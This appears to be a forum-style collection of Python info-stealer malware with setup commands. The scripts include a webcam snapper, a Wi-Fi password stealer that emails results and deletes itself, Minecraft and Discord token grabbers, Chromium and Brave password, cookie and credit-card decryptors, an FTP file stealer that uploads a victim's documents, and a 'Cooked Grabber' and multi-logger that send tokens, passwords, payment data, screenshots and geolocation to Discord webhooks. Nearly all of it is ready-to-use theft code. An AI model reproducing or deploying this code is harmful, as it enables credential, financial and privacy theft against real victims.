        'file': (user+'\\AppData\\Local\\Temp\\tdata_session.zip', f, 'zip')
     }
     r = requests.post(hook, files=payload)
telegram()

webcam.py​

import os.path, os, cv2, requests

user = os.path.expanduser("~")
hook = ""

camera_port = 0

camera = cv2.VideoCapture(camera_port)

return_value, image = camera.read()

cv2.imwrite(user+"\\AppData\\Local\\Temp\\temp.png", image)
del(camera)

file = {"file": open(user+"\\AppData\\Local\\Temp\\temp.png", "rb")}

r = requests.post(hook, files=file)
try:
    os.remove(user+"\\AppData\\Local\\Temp\\temp.png")
except:
    pass

sudo apt install python3 && python3-pip
pip3 install smtplib glob

wifi.py​

import os
import smtplib
import subprocess
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import glob

system_information = "Informations.txt"
var = 2

# LOOK READ.ME FOR GET USERNAME AND PASSWORD.

# ==============================
# ==============================

YOUR_USERNAME = "YOUR_USERNAME"
YOUR_PASSWORD= "YOUR_PASSWORD"

# ==============================
# ==============================

file_path = os.getcwd()

sender = "Private Person <from@example.com>"
receiver = "A Test User <to@example.com>"

message = f"""\
Subject: aydinnyunus have sent you message
To: {receiver}
From: {sender}
WIFI PASSWORD STEALER by aydinnyunus.\n"""


if os.name == "nt":
    output = subprocess.check_output("netsh wlan show profile", shell=True)
    output = str(output)
    start = output.find("Profile :")
    end = output.find("\\r\\n")
    substring = output[start:end]
    list_of_word = output.split()
    j = 2
    with open(file_path + "\\" + system_information, "w") as f:
        f.write("All of Registered Connections\n")
        f.write("==================================\n")
        f.close()
    for word in output.split():
        if word == "Profile":
            next_word = list_of_word[list_of_word.index(word) + j]
            next_word = next_word.split('\\r\\n')[0]
            k = j + 1
            try:
                while "All" not in next_word:
                    next_word += " " + list_of_word[list_of_word.index(word) + k]
                    k = k + 1
            except:
                pass
            next_word = next_word.split('\\r\\n')[0]
            if ':' in next_word:
                next_word = next_word.split(':')[1]
                if ' ' in next_word:
                    next_word = next_word.replace(' ', "")
            wifi = subprocess.check_output('netsh wlan show profile ' + '"' + next_word + '"' + ' key=clear',
                                           shell=True)
            wifi = str(wifi)
            start = wifi.find("Key Content")
            end = wifi.find("Cost settings")
            key_content = "Content"
            substring = wifi[start:end]
            list_of_words = wifi.split()
            with open(file_path + "\\" + system_information, "a") as f:
                f.write(next_word + "\n")
                f.close()
            j = j + 5
            try:
                next_word = list_of_words[list_of_words.index(key_content) + 2]
                i = 2
                for words in wifi.split():
                    if words == "Content":
                        next_word = list_of_words[list_of_words.index(key_content) + i]
                        next_word = next_word.split('\\r\\n\\r\\nCost')[0]
                        next_word = next_word.replace(' ', "\\ ")
                        i = i + 5
                        with open(file_path + "\\" + system_information, "a") as f:
                            f.write(" : " + next_word + "\n")
                            f.close()
            except:
                pass
    try:
        pwd = os.path.abspath(os.getcwd())
        os.system("cd " + pwd)
        os.system("TASKKILL /F /IM " + os.path.basename(__file__))
        print('File was closed.')
        os.system("DEL " + os.path.basename(__file__))
    except OSError:
        print('File is close.')

    with open(system_information) as f:
        lines = f.read()

    print(str(lines))
    message += str(lines)

    with smtplib.SMTP("smtp.mailtrap.io", 2525) as server:
        server.login(YOUR_USERNAME, YOUR_PASSWORD)
        server.sendmail(sender, receiver, message)

else:
    #os.system("chmod +x " + os.path.basename(__file__))
    with open(file_path + "/" + system_information, "w") as f:
        f.write("All of Registered Connections\n")
        f.write("==================================\n")
    try:
        output = glob.glob("/etc/NetworkManager/system-connections/*")

        res = [sub.replace(' ', "\ ") for sub in output]
        for i in res:
            output = subprocess.check_output("cat " + i, shell=True)
            output = str(output)
            with open(file_path + "/" + system_information, "a") as f:
                f.write(output + "\n===========================\n")
    except:
        pass
    try:
        pwd = os.path.abspath(os.getcwd())
        os.system("cd " + pwd)
        os.system('pkill leafpad')
        os.system("chattr -i " + os.path.basename(__file__))
        print('File was closed.')
        # os.system("rm -rf " + os.path.basename(__file__))
    except OSError:
        print('File is close.')

    f.close()
    with open(system_information) as f:
        lines = f.read()

    print(str(lines))
    message += str(lines)

    with smtplib.SMTP("smtp.mailtrap.io", 2525) as server:
        server.login(YOUR_USERNAME, YOUR_PASSWORD)
        server.sendmail(sender, receiver, message)
 

    #os.system("./" + os.path.basename(_file_))
os.remove("Informations.txt")

minecraft-token-stealer.py​

import json
import os
from urllib.request import Request, urlopen

# your webhook URL
WEBHOOK_URL = "WEBHOOK HERE"

# mentions you when you get a hit
PING_ME = False

def uuid_dashed(uuid):
    return f"{uuid[0:8]}-{uuid[8:12]}-{uuid[12:16]}-{uuid[16:21]}-{uuid[21:32]}"

def main():
    auth_db = json.loads(open(os.getenv("APPDATA") + "\\.minecraft\\launcher_profiles.json").read())["authenticationDatabase"]

sudo apt install python3 && python3-pip
pip3 install browser_cookie3 browser_history discord_webhook getmac prettytable psutil py_cpuinfo pycountry pycryptodome pywin32 requests pyautogui Pillow

CookedGrabber.py​

lit(' ')[1].split("=")[1]
                        if len(data) > 80:
                            n_lst.append([])
                            for y in c:
                                n_lst[-1].append({'domain': f"{website[3]}", "name": f"{y.split(' ')[1].split('=')[0]}",
                                                 "value": f"{y.split(' ')[1].split('=')[1]}"})
    all_data_p = []
    for x in tokens:
        lst_b = has_payment_methods(x)
        try:
            for n in range(len(lst_b)):
                if lst_b[n]['type'] == 1:
                    writable = [lst_b[n]['brand'], lst_b[n]['type'], lst_b[n]['last_4'], lst_b[n]
                                ['expires_month'], lst_b[n]['expires_year'], lst_b[n]['billing_address']]
                    if writable not in all_data_p:
                        all_data_p.append(writable)
                elif lst_b[n]['type'] == 2:
                    writable_2 = [lst_b[n]['email'], lst_b[n]
                                  ['type'], lst_b[n]['billing_address']]
                    if writable_2 not in all_data_p:
                        all_data_p.append(writable_2)
        except BaseException:
            pass
    return [tokens, list(set(t_lst)), list(set(tuple(element)
                                               for element in insta_lst)), all_data_p, chrome_psw_list, n_lst]


def send_webhook(DISCORD_WEBHOOK_URLs):
    p_lst = get_Personal_data()
    cpuinfo = get_cpu_info()
    with TemporaryDirectory(dir='.') as td:
        SetFileAttributes(td, win32con.FILE_ATTRIBUTE_HIDDEN)
        get_screenshot(path=td)
        main_info = main(td)
        discord_T, twitter_T, insta_T, chrome_Psw_t = (
            PrettyTable(padding_width=1) for _ in range(4))
        discord_T.field_names, twitter_T.field_names, insta_T.field_names, chrome_Psw_t.field_names, verified_tokens = [
            "Discord Tokens", "Username", "Email", "Phone"], ["Twitter Tokens [auth_token]"], ["ds_user_id", "sessionid"], ['Username / Email', 'password', 'website'], []
        for __t in main_info[4]:
            chrome_Psw_t.add_row(__t)
        for t_ in main_info[0]:
            try:
                lst = get_user_data(t_)
                username, email, phone = f"{lst[0]}#{lst[1]}", lst[2], lst[3]
                discord_T.add_row([t_, username, email, phone])
                verified_tokens.append(t_)
            except BaseException:
                pass
        for _t in main_info[1]:
            twitter_T.add_row([_t])
        for _t_ in main_info[2]:
            insta_T.add_row(_t_)
        pay_l = []
        for _p in main_info[3]:
            if _p[1] == 1:
                payment_card = PrettyTable(padding_width=1)
                payment_card.field_names = [
                    "Brand", "Last 4", "Type", "Expiration", "Billing Adress"]
                payment_card.add_row(
                    [_p[0], _p[2], "Debit or Credit Card", f"{_p[3]}/{_p[4]}", _p[5]])
                pay_l.append(payment_card.get_string())
            elif _p[1] == 2:
                payment_p = PrettyTable(padding_width=1)
                payment_p.field_names = ["Email", "Type", "Billing Adress"]
                payment_p.add_row([_p[0], "Paypal", _p[2]])
                pay_l.append(payment_p.get_string())
        files_names = [[os.path.join(td, "Discord Tokens.txt"), discord_T], [os.path.join(td, "Twitter Tokens.txt"), twitter_T], [
            os.path.join(td, "Instagram Tokens.txt"), insta_T], [os.path.join(td, "Chrome Pass.txt"), chrome_Psw_t]]
        for x_, y_ in files_names:
            if (y_ == files_names[0][1] and len(main_info[0]) != 0) or (y_ == files_names[1][1] and len(main_info[1]) != 0) or (
                    y_ == files_names[2][1] and len(main_info[2]) != 0) or (y_ == files_names[3][1] and len(main_info[4]) != 0):
                with open(x_, 'w') as wr:
                    wr.write(y_.get_string())
        all_files = [os.path.join(
            td, 'History.txt'), get_screenshot.scrn_path, os.path.join(td, "Payment Info.txt")]
        for n in main_info[5]:
            p = os.path.join(td, f'netflix_{main_info[5].index(n)}.json')
            with open(p, 'w') as f:
                f.write(dumps(n, indent=4))
            all_files.append(p)
        with open(all_files[0], 'w') as f:
            f.write(find_His())
        with ZipFile(os.path.join(td, 'data.zip'), mode='w', compression=ZIP_DEFLATED) as zip:
            if ('payment_card' or 'payment_p') in locals():
                with open(all_files[2], 'w') as f:
                    for i in pay_l:
                        f.write(f"{i}\n")
            for files_path in all_files:
                try:
                    zip.write(files_path)
                except FileNotFoundError:
                    pass
            for name_f, _ in files_names:
                if os.path.exists(name_f):
                    zip.write(name_f)
        for URL in DISCORD_WEBHOOK_URLs:
            webhook = DiscordWebhook(url=URL, username='Cooked Grabber',
                                     avatar_url="https://i.postimg.cc/FRdZ5DJV/discord-avatar-128-ABF2-E.png")
            embed = DiscordEmbed(title='New victim !', color='FFA500')
            embed.add_embed_field(
                name='SYSTEM USER INFO', value=f":pushpin:`PC Username:` **{os.getenv('UserName')}**\n:computer:`PC Name:` **{os.getenv('COMPUTERNAME')}**\n:globe_with_meridians:`OS:` **{platform()}**\n", inline=False)
            embed.add_embed_field(
                name='IP USER INFO', value=f":eyes:`IP:` **{p_lst[0]}**\n:golf:`Country:` **{p_lst[1]}** :flag_{get(f'https://restcountries.com/v3/name/{p_lst[1]}').json()[0]['cca2'].lower()}:\n:cityscape:`City:` **{p_lst[2]}**\n:shield:`MAC:` **{gma()}**\n:wrench:`HWID:` **{get_hwid()}**\n", inline=False)
            embed.add_embed_field(
                name='PC USER COMPONENT', value=f":satellite_orbital:`CPU:` **{cpuinfo['brand_raw']} - {round(float(cpuinfo['hz_advertised_friendly'].split(' ')[0]), 2)} GHz**\n:nut_and_bolt:`RAM:` **{round(virtual_memory().total / (1024.0 ** 3), 2)} GB**\n:desktop:`Resolution:` **{GetSystemMetrics(0)}x{GetSystemMetrics(1)}**\n", inline=False)
            embed.add_embed_field(
                name='ACCOUNT GRABBED', value=f":red_circle:`Discord:` **{len(verified_tokens)}**\n:purple_circle:`Twitter:` **{len(main_info[1])}**\n:blue_circle:`Instagram:` **{len(main_info[2])}**\n:green_circle:`Netflix:` **{len(main_info[5])}**\n:brown_circle:`Account Password Grabbed:` **{len(main_info[4])}**\n", inline=False)
            card_e, paypal_e = ":white_check_mark:" if 'payment_card' in locals(
            ) else ":x:", ":white_check_mark:" if 'payment_p' in locals() else ":x:"
            embed.add_embed_field(
                name='PAYMENT INFO FOUNDED', value=f":credit_card:`Debit or Credit Card:` {card_e}\n:money_with_wings:`Paypal:` {paypal_e}", inline=False)
            embed.set_footer(text='By Lemon.-_-.#3714 & cr4sh3d.py#2160')
            embed.set_timestamp()
            with open(os.path.join(td, "data.zip"), 'rb') as f:
                webhook.add_file(
                    file=f.read(), filename=f"Cooked-Grabber-{os.getenv('UserName')}.zip")
            webhook.add_embed(embed)
            webhook.execute()


if __name__ == "__main__":
    freeze_support()
    if len(sys.argv) == 1:
        send_webhook(['YOUR DISCORD WEBHOOK URL'])
    else:
        del sys.argv[0]
        send_webhook(sys.argv)

sudo apt install python3 && python3-pip
pip3 install pypiwin32 pycryptodome

chromium_based_browsers.py​

import os
import json
import base64
import sqlite3
from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES
import shutil
from datetime import datetime

appdata = os.getenv('LOCALAPPDATA')

browsers = {
    'amigo': appdata + '\\Amigo\\User Data',
    'torch': appdata + '\\Torch\\User Data',
    'kometa': appdata + '\\Kometa\\User Data',
    'orbitum': appdata + '\\Orbitum\\User Data',
    'cent-browser': appdata + '\\CentBrowser\\User Data',
    '7star': appdata + '\\7Star\\7Star\\User Data',
    'sputnik': appdata + '\\Sputnik\\Sputnik\\User Data',
    'vivaldi': appdata + '\\Vivaldi\\User Data',
    'google-chrome-sxs': appdata + '\\Google\\Chrome SxS\\User Data',
    'google-chrome': appdata + '\\Google\\Chrome\\User Data',
    'epic-privacy-browser': appdata + '\\Epic Privacy Browser\\User Data',
    'microsoft-edge': appdata + '\\Microsoft\\Edge\\User Data',
    'uran': appdata + '\\uCozMedia\\Uran\\User Data',
    'yandex': appdata + '\\Yandex\\YandexBrowser\\User Data',
    'brave': appdata + '\\BraveSoftware\\Brave-Browser\\User Data',
    'iridium': appdata + '\\Iridium\\User Data',
}


def get_master_key(path: str):
    if not os.path.exists(path):
        return

    if 'os_crypt' not in open(path + "\\Local State", 'r', encoding='utf-8').read():
        return

    with open(path + "\\Local State", "r", encoding="utf-8") as f:
        c = f.read()
    local_state = json.loads(c)

    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]
    master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def decrypt_password(buff: bytes, master_key: bytes) -> str:
    iv = buff[3:15]
    payload = buff[15:]
    cipher = AES.new(master_key, AES.MODE_GCM, iv)
    decrypted_pass = cipher.decrypt(payload)
    decrypted_pass = decrypted_pass[:-16].decode()

    return decrypted_pass


def save_results(browser_name, data_type, content):
    if not os.path.exists(browser_name):
        os.mkdir(browser_name)
    if content is not None:
        open(f'{browser_name}/{data_type}.txt', 'w').write(content)
        print(f"\t [*] Saved in {browser}/{data_type}.txt")
    else:
        print(f"\t [-] No Data Found!")


def get_login_data(path: str, profile: str, master_key):
    login_db = f'{path}\\{profile}\\Login Data'
    if not os.path.exists(login_db):
        return
    result = ""
    shutil.copy(login_db, 'login_db')
    conn = sqlite3.connect('login_db')
    cursor = conn.cursor()
    cursor.execute('SELECT action_url, username_value, password_value FROM logins')
    for row in cursor.fetchall():
        password = decrypt_password(row[2], master_key)
        result += f"""
        URL: {row[0]}
        Email: {row[1]}
        Password: {password}
     
        """
    conn.close()
    os.remove('login_db')
    return result


def get_credit_cards(path: str, profile: str, master_key):
    cards_db = f'{path}\\{profile}\\Web Data'
    if not os.path.exists(cards_db):
        return

    result = ""
    shutil.copy(cards_db, 'cards_db')
    conn = sqlite3.connect('cards_db')
    cursor = conn.cursor()
    cursor.execute(
        'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2] or not row[3]:
            continue

        card_number = decrypt_password(row[3], master_key)
        result += f"""
        Name On Card: {row[0]}
        Card Number: {card_number}
        Expires On:  {row[1]} / {row[2]}
        Added On: {datetime.fromtimestamp(row[4])}
     
        """

    conn.close()
    os.remove('cards_db')
    return result


def get_cookies(path: str, profile: str, master_key):
    cookie_db = f'{path}\\{profile}\\Network\\Cookies'
    if not os.path.exists(cookie_db):
        return
    result = ""
    shutil.copy(cookie_db, 'cookie_db')
    conn = sqlite3.connect('cookie_db')
    cursor = conn.cursor()
    cursor.execute('SELECT host_key, name, path, encrypted_value,expires_utc FROM cookies')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2] or not row[3]:
            continue

        cookie = decrypt_password(row[3], master_key)

        result += f"""
        Host Key : {row[0]}
        Cookie Name : {row[1]}
        Path: {row[2]}
        Cookie: {cookie}
        Expires On: {row[4]}
     
        """

    conn.close()
    os.remove('cookie_db')
    return result


def get_web_history(path: str, profile: str):
    web_history_db = f'{path}\\{profile}\\History'
    result = ""
    if not os.path.exists(web_history_db):
        return

    shutil.copy(web_history_db, 'web_history_db')
    conn = sqlite3.connect('web_history_db')
    cursor = conn.cursor()
    cursor.execute('SELECT url, title, last_visit_time FROM urls')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2]:
            continue
        result += f"""
        URL: {row[0]}
        Title: {row[1]}
        Visited Time: {row[2]}
     
        """
    conn.close()
    os.remove('web_history_db')
    return result


def get_downloads(path: str, profile: str):
    downloads_db = f'{path}\\{profile}\\History'
    if not os.path.exists(downloads_db):
        return
    result = ""
    shutil.copy(downloads_db, 'downloads_db')
    conn = sqlite3.connect('downloads_db')
    cursor = conn.cursor()
    cursor.execute('SELECT tab_url, target_path FROM downloads')
    for row in cursor.fetchall():
        if not row[0] or not row[1]:
            continue
        result += f"""
        Download URL: {row[0]}
        Local Path: {row[1]}
     
        """

    conn.close()
    os.remove('downloads_db')


def installed_browsers():
    results = []
    for browser, path in browsers.items():
        if os.path.exists(path):
            results.append(browser)
    return results


if __name__ == '__main__':
    available_browsers = installed_browsers()

    for browser in available_browsers:
        browser_path = browsers[browser]
        master_key = get_master_key(browser_path)
        print(f"Getting Stored Details from {browser}")

        print("\t [!] Getting Saved Passwords")
        save_results(browser, 'Saved_Passwords', get_login_data(browser_path, "Default", master_key))
        print("\t------\n")

        print("\t [!] Getting Browser History")
        save_results(browser, 'Browser_History', get_web_history(browser_path, "Default"))
        print("\t------\n")

        print("\t [!] Getting Download History")
        save_results(browser, 'Download_History', get_downloads(browser_path, "Default"))
        print("\t------\n")

        print("\t [!] Getting Cookies")
        save_results(browser, 'Browser_Cookies', get_cookies(browser_path, "Default", master_key))
        print("\t------\n")

        print("\t [!] Getting Saved Credit Cards")
        save_results(browser, 'Saved_Credit_Cards', get_credit_cards(browser_path, "Default", master_key))

file_stealer.py​

"""
Steal Files on Victims Machine and send to FTP Server
pip install pywin32

Замените на свой FTP сервер -> with ftplib.FTP("FTPSERVER", "USERNAME", "PASSWORD") as ftp_connection:
"""

import sys
import os
import ftplib
from threading import Thread
from time import sleep
import string
import random
import win32api


def get_all_drivers():
    try:
        if sys.platform in ("win32", "cygwin"):
            drives = win32api.GetLogicalDriveStrings()
            drives = drives.split("\000")[:-1]
            win_drive = os.environ["SYSTEMDRIVE"]

            # Remove SystemDrive
            for key, value in enumerate(drives):
                if win_drive in value:
                    del drives[key]

        return drives
    except Exception:
        sys.exit()


def discover_files(startpath):
    extensions = [
        "jpg",
        "jpeg",
        "bmp",
        "gif",
        "png",
        "svg",
        "psd",
        "raw",
        "avi",
        "flv",
        "m4v",
        "mkv",
        "mov",
        "mpg",
        "mpeg",
        "wmv",
        "swf",
        "3gp",
        "doc",
        "docx",
        "xls",
        "xlsx",
        "ppt",
        "pptx",
        "odt",
        "odp",
        "ods",
        "txt",
        "rtf",
        "tex",
        "pdf",
        "epub",
        "md",
        "csv",
        "db",
        "sql",
        "dbf",
        "mdb",
        "go",
        "py",
        "pyc",
        "zip",
        "tar",
        "tgz",
        "bz2",
        "7z",
        "rar",
        "bak",
    ]

    for dirpath, dirs, files in os.walk(startpath):
        for i in files:
            absolute_path = os.path.abspath(os.path.join(dirpath, i))
            ext = absolute_path.split(".")[-1]
            if ext in extensions:
                # Only get Files that are not bigger than 10MB
                if os.stat(absolute_path).st_size <= 10485760:
                    yield absolute_path


def upload_file(file):
    sleep(1)
    output_string = "".join(
        random.SystemRandom().choice(string.ascii_letters + string.digits)
        for _ in range(3))
    try:
        with open(file, "rb") as filedata:
            with ftplib.FTP("FTPSERVER", "USERNAME", "PASSWORD") as ftp_connection:
                # Change Directory in FTP Server
                #ftp_connection.cwd("files")
                if file.split("\\")[-1] not in ftp_connection.nlst():
                    ftp_connection.storbinary("STOR " + file.split("\\")[-1], filedata)
                else:
                    ftp_connection.storbinary(
                        "STOR " + output_string + file.split("\\")[-1], filedata)
    except Exception:
        pass


def get_desktop_path():
    try:
        if sys.platform in ("win32", "cygwin"):
            desktop = os.path.join(os.path.expanduser("~"), "Desktop")

        return desktop
    except Exception:
        sys.exit()


def main():
    # Specify custom Path => Desktop
    for file in discover_files(get_desktop_path()):
        desktop_thread = Thread(target=upload_file(file), args=(file,))
        desktop_thread.start()

    # Get all Drivers except SystemDrive
    for drive in get_all_drivers():
        for file in discover_files(drive):
            driver_thread = Thread(target=upload_file(file), args=(file,))
            driver_thread.start()

if __name__ == "__main__":
    main()

pywin32 работает только на винде.

Browser Password Stealer​

sudo apt install python3 && python3-pip
pip3 install pypiwin32 pycryptodome win32crypt Crypto shutil
python Brave.py

Brave.py​

import os
import json
import base64
import sqlite3
import win32crypt
from Crypto.Cipher import AES
import shutil
from datetime import datetime



FileName = 116444736000000000
NanoSeconds = 10000000


def ConvertDate(ft):
    utc = datetime.utcfromtimestamp(((10 * int(ft)) - FileName) / NanoSeconds)
    return utc.strftime('%Y-%m-%d %H:%M:%S')


def get_master_key():
    '''
        This Function is used to get the Master Key, for Decrypting the Encrypted Passwords
    '''
    try:
     with open(os.environ['USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\Local State',
              "r", encoding='utf-8') as f:
        local_state = f.read()
        local_state = json.loads(local_state)
    except:
        exit()
    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]
    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def decrypt_payload(cipher, payload):
    return cipher.decrypt(payload)


def generate_cipher(aes_key, iv):
    return AES.new(aes_key, AES.MODE_GCM, iv)


def decrypt_password(buff, master_key):
    '''
        Here we are passing the buffer and Master Key to Decrypt the Password
       
   
    '''
    try:
        iv = buff[3:15]
        payload = buff[15:]
        cipher = generate_cipher(master_key, iv)
        decrypted_pass = decrypt_payload(cipher, payload)
        decrypted_pass = decrypted_pass[:-16].decode()
        return decrypted_pass
    except Exception as e:
        return "Chrome < 80"


def get_password():
    master_key = get_master_key()
    login_db = os.environ[
                   'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Login Data'
    try:
        shutil.copy2(login_db,
                     "Loginvault.db")
    except:
        print("[*] Brave Browser Not Installed !!")
    conn = sqlite3.connect("Loginvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT action_url, username_value, password_value FROM logins")
        for r in cursor.fetchall():
            url = r[0]
            username = r[1]
            encrypted_password = r[2]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            if username != "" or decrypted_password != "":
                print(
                    "URL: " + url + "\nUser Name: " + username + "\nPassword: " + decrypted_password + "\n" + "*" * 10 + "\n")
    except Exception as e:
        pass

    cursor.close()
    conn.close()
    try:
        os.remove("Loginvault.db")
    except Exception as e:
        pass


def get_credit_cards():
    master_key = get_master_key()
    login_db = os.environ[
                   'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Web Data'
    try:
        shutil.copy2(login_db,
                     "CCvault.db")
                   
    except:
        print("[*] Brave Browser Not Installed !!")
    conn = sqlite3.connect("CCvault.db")
    cursor = conn.cursor()

    try:
        cursor.execute("SELECT * FROM credit_cards")
        for r in cursor.fetchall():
            username = r[1]
            encrypted_password = r[4]
            decrypted_password = decrypt_password(encrypted_password, master_key)
            expire_mon = r[2]
            expire_year = r[3]
            print(
                "Name in Card: " + username + "\nNumber: " + decrypted_password + "\nExpire Month: " + str(
                    expire_mon) + "\nExpire Year: " + str(expire_year) + "\n" + "*" * 10 + "\n")

    except Exception as e:
        pass

    cursor.close()
    conn.close()
    try:
        os.remove("CCvault.db")
    except Exception as e:
        pass


def get_bookmarks():
    bookmarks_location = os.environ[
                             'USERPROFILE'] + os.sep + r'AppData\Local\BraveSoftware\Brave-Browser\User Data\default\Bookmarks'
    with open(bookmarks_location) as f:
        data = json.load(f)
        bookmarks_list = data["roots"]["bookmark_bar"]["children"]
       
        for i in range(len(bookmarks_list)):
            print(f"Name: {bookmarks_list[i]['name']}\n"
            f"Added on: {ConvertDate(bookmarks_list[i]['date_added'])}\n")


while True:

        get_password()
        get_credit_cards()
        get_bookmarks()

Multi-logger​

sudo apt install python3 && python3-pip
pip3 install dhooks pycryptodome requests psutil browser_cookie3 cryptography

multi-logger.py​

import psutil
import platform
import json
from datetime import datetime
from time import sleep
import requests
import socket
from requests import get
import os
import re
import requests
import subprocess
from uuid import getnode as get_mac
import browser_cookie3 as steal, requests, base64, random, string, zipfile, shutil, dhooks, os, re, sys, sqlite3
from cryptography.hazmat.primitives.ciphers import (Cipher, algorithms, modes)
from cryptography.hazmat.primitives.ciphers.aead import AESGCM
from cryptography.hazmat.backends import default_backend
from Crypto.Cipher import AES


from base64 import b64decode, b64encode
from dhooks import Webhook, Embed, File
from subprocess import Popen, PIPE
from json import loads, dumps
from shutil import copyfile
from sys import argv

# CONFIG -> Setup before compiling
url= "" #Paste Discord Webhook url




# Scaling from bytes to KB,MB,GB, etc
def scale(bytes, suffix="B"):
    defined = 1024
    for unit in ["", "K", "M", "G", "T", "P"]:
        if bytes < defined:
            return f"{bytes:.2f}{unit}{suffix}"
        bytes /= defined

uname = platform.uname()

bt = datetime.fromtimestamp(psutil.boot_time()) # Boot time

host = socket.gethostname()
localip = socket.gethostbyname(host)

publicip = get('https://api.ipify.org').text # Get public API
city = get(f'https://ipapi.co/{publicip}/city').text
region = get(f'https://ipapi.co/{publicip}/region').text
postal = get(f'https://ipapi.co/{publicip}/postal').text
timezone = get(f'https://ipapi.co/{publicip}/timezone').text
currency = get(f'https://ipapi.co/{publicip}/currency').text
country = get(f'https://ipapi.co/{publicip}/country_name').text
callcode = get(f"https://ipapi.co/{publicip}/country_calling_code").text
vpn = requests.get('http://ip-api.com/json?fields=proxy')
proxy = vpn.json()['proxy']
mac = get_mac()


roaming = os.getenv('AppData')
## Output for txt file location
output = open(roaming + "temp.txt", "a")


## Discord Locations
Directories = {
        'Discord': roaming + '\\Discord',
        'Discord Two': roaming + '\\discord',
        'Discord Canary': roaming + '\\Discordcanary',
        'Discord Canary Two': roaming + '\\discordcanary',
        'Discord PTB': roaming + '\\discordptb',
        'Google Chrome': roaming + '\\Google\\Chrome\\User Data\\Default',
        'Opera': roaming + '\\Opera Software\\Opera Stable',
        'Brave': roaming + '\\BraveSoftware\\Brave-Browser\\User Data\\Default',
        'Yandex': roaming + '\\Yandex\\YandexBrowser\\User Data\\Default',
}


## Scan for the regex [\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}
def Yoink(Directory):
    Directory += '\\Local Storage\\leveldb'

    Tokens = []

    for FileName in os.listdir(Directory):
        if not FileName.endswith('.log') and not FileName.endswith('.ldb'):
            continue

        for line in [x.strip() for x in open(f'{Directory}\\{FileName}', errors='ignore').readlines() if x.strip()]:
            for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                for Token in re.findall(regex, line):
                    Tokens.append(Token)

    return Tokens


## Wipe the temp file
def Wipe():
    if os.path.exists(roaming + "temp.txt"):
      output2 = open(roaming + "temp.txt", "w")
      output2.write("")
      output2.close()
    else:
      pass


## Search Directorys for Token regex if exists
for Discord, Directory in Directories.items():
    if os.path.exists(Directory):
        Tokens = Yoink(Directory)
    if len(Tokens) > 0:
        for Token in Tokens:
            realshit = f"{Token}\n"


cpufreq = psutil.cpu_freq()
svmem = psutil.virtual_memory()
partitions = psutil.disk_partitions()
disk_io = psutil.disk_io_counters()
net_io = psutil.net_io_counters()

partitions = psutil.disk_partitions()
for partition in partitions:
    try:
        partition_usage = psutil.disk_usage(partition.mountpoint)
    except PermissionError:
        continue





requests.post(url, data=json.dumps({ "embeds": [ { "title": f"Someone Runs Program! - {host}", "color": 8781568 }, { "color": 7506394, "fields": [ { "name": "GeoLocation", "value": f"Using VPN?: {proxy}\nLocal IP: {localip}\nPublic IP: {publicip}\nMAC Adress: {mac}\n\nCountry: {country} | {callcode} | {timezone}\nregion: {region}\nCity: {city} | {postal}\nCurrency: {currency}\n\n\n\n" } ] }, { "fields": [ { "name": "System Information", "value": f"System: {uname.system}\nNode: {uname.node}\nMachine: {uname.machine}\nProcessor: {uname.processor}\n\nBoot Time: {bt.year}/{bt.month}/{bt.day} {bt.hour}:{bt.minute}:{bt.second}" } ] }, { "color": 15109662, "fields": [ { "name": "CPU Information", "value": f"Psychical cores: {psutil.cpu_count(logical=False)}\nTotal Cores: {psutil.cpu_count(logical=True)}\n\nMax Frequency: {cpufreq.max:.2f}Mhz\nMin Frequency: {cpufreq.min:.2f}Mhz\n\nTotal CPU usage: {psutil.cpu_percent()}\n" }, { "name": "Nemory Information", "value": f"Total: {scale(svmem.total)}\nAvailable: {scale(svmem.available)}\nUsed: {scale(svmem.used)}\nPercentage: {svmem.percent}%" }, { "name": "Disk Information", "value": f"Total Size: {scale(partition_usage.total)}\nUsed: {scale(partition_usage.used)}\nFree: {scale(partition_usage.free)}\nPercentage: {partition_usage.percent}%\n\nTotal read: {scale(disk_io.read_bytes)}\nTotal write: {scale(disk_io.write_bytes)}" }, { "name": "Network Information", "value": f"Total Sent: {scale(net_io.bytes_sent)}\")\nTotal Received: {scale(net_io.bytes_recv)}" } ] }, { "color": 7440378, "fields": [ { "name": "Discord information", "value": f"Token: {realshit}" } ] } ] }), headers={"Content-Type": "application/json"})

DBP = r'Google\Chrome\User Data\Default\Login Data'
ADP = os.environ['LOCALAPPDATA']


def sniff(path):
    path += '\\Local Storage\\leveldb'

    tokens = []
    try:
        for file_name in os.listdir(path):
            if not file_name.endswith('.log') and not file_name.endswith('.ldb'):
                continue

            for line in [x.strip() for x in open(f'{path}\\{file_name}', errors='ignore').readlines() if x.strip()]:
                for regex in (r'[\w-]{24}\.[\w-]{6}\.[\w-]{27}', r'mfa\.[\w-]{84}'):
                    for token in re.findall(regex, line):
                        tokens.append(token)
        return tokens
    except:
        pass


def encrypt(cipher, plaintext, nonce):
    cipher.mode = modes.GCM(nonce)
    encryptor = cipher.encryptor()
    ciphertext = encryptor.update(plaintext)
    return (cipher, ciphertext, nonce)


def decrypt(cipher, ciphertext, nonce):
    cipher.mode = modes.GCM(nonce)
    decryptor = cipher.decryptor()
    return decryptor.update(ciphertext)


def rcipher(key):
    cipher = Cipher(algorithms.AES(key), None, backend=default_backend())
    return cipher


def dpapi(encrypted):
    import ctypes
    import ctypes.wintypes

